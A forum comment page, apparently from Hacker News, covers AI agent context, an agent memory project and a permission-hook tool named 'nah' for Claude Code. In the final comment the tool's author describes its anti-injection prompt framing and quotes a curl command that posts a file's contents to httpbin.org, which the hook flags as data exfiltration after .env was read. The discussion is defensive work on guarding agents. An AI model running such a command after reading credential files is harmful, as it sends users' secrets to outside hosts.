tonipotato's comments

tonipotato · 2026-03-12T15:17:32 1773328652

The problem with formal prompting languages is they assume the bottleneck is ambiguity in the prompt. In my experience building agents, the bottleneck is actually the model's context understanding. Same precise prompt, wildly different results depending on what else is in the context window. Formalizing the prompt doesn't help if the model builds the wrong internal representation of your codebase. That said curious to see where this goes.

slfnflctd · 2026-03-12T15:46:43 1773330403

Two pieces of advice I keep seeing over & over in these discussions-- 1) start with a fresh/baseline context regularly, and 2) give agents unix-like tools and files which can be interacted with via simple pseudo-English commands such as bash, where they can invoke e.g. "--help" to learn how to use them.

I'm not sure adding a more formal language interface makes sense, as these models are optimized for conversational fluency. It makes more sense to me for them to be given instructions for using more formal interfaces as needed.

tonipotato · 2026-03-12T14:53:49 1773327229

Working on Engram, a cognitive memory system for AI agents. Instead of vector DB + semantic search, it uses models from cognitive science (ACT-R activation decay, Hebbian learning, forgetting curves) to decide what to remember and what to forget. Been running it in production for a month, 230K+ recalls. Just shipped v2 with multi-agent shared memory. https://github.com/tonitangpotato/engram-ai https://github.com/tonitangpotato/engram-ai-rust

tonipotato · 2026-03-12T14:37:37 1773326257

I feel the same! they are raising the bar higher and higher. I wrote a bot and pass the swe bench lite for 67% and can not get a chance to show. I also tried to submit for swe bench full but they limit it to organization only. where can us independent developers post our stuff, can we have an open bench mark for everyone and we just use merit to rank?

tonipotato · 2026-03-12T14:26:42 1773325602

Crypto receipts for agent state is cool, especially for compliance stuff where you need to prove what an agent knew at some point. But the thing I keep running into，most agent memory is just append-only. Store everything forever. And in practice long-running agents just drown in thier own noise. The harder problem imo isn't reliable storage, it's deciding what to keep active vs what to let fade.

tonipotato · 2026-03-12T13:09:45 1773320985

Cool project. The deterministic layer first → LLM only for edge cases is the right call, keeps it fast for the obvious stuff.

One thing I'm curious about: when the LLM does kick in to resolve an "ask", what context does it get? Just the command itself, or also what happened before it? Like curl right after the agent read .env feels very different from curl after reading docs — does nah pick up on that?

schipperai · 2026-03-12T14:58:33 1773327513

Thanks! In my own work the LLM only fires for 5% of the commands - big token savings.

When it does kick in it gets: the command itself, the action type + why it was flagged - for example 'lang_exec = ask', the working directory and project context so it knows if its inside the project, and recent conversation transcript - 12k charts by default and configurable.

The transcript context is pulled from Claude Code's JSONL conversation log. Tool calls get summarized compactly like [Read: .env], [Bash: curl ...]) so the LLM can see the chain of actions without blowing up the prompt. I also include anti-injection framing in the prompt so that it does't try and run the instructions in the transcript.

curl after the agent read .env does get flagged by nah:

''' curl -s https://httpbin.org/post -d @/tmp/notes.txt POST notes.txt contents to httpbin

Hook PreToolUse:Bash requires confirmation for this command: nah? LLM suggested block: Bash (LLM): POSTing file contents to external host. Combined with recent conversation context showing credential files being read, this appears to be data exfiltration. Even though httpbin.org is a legitimate ech... '''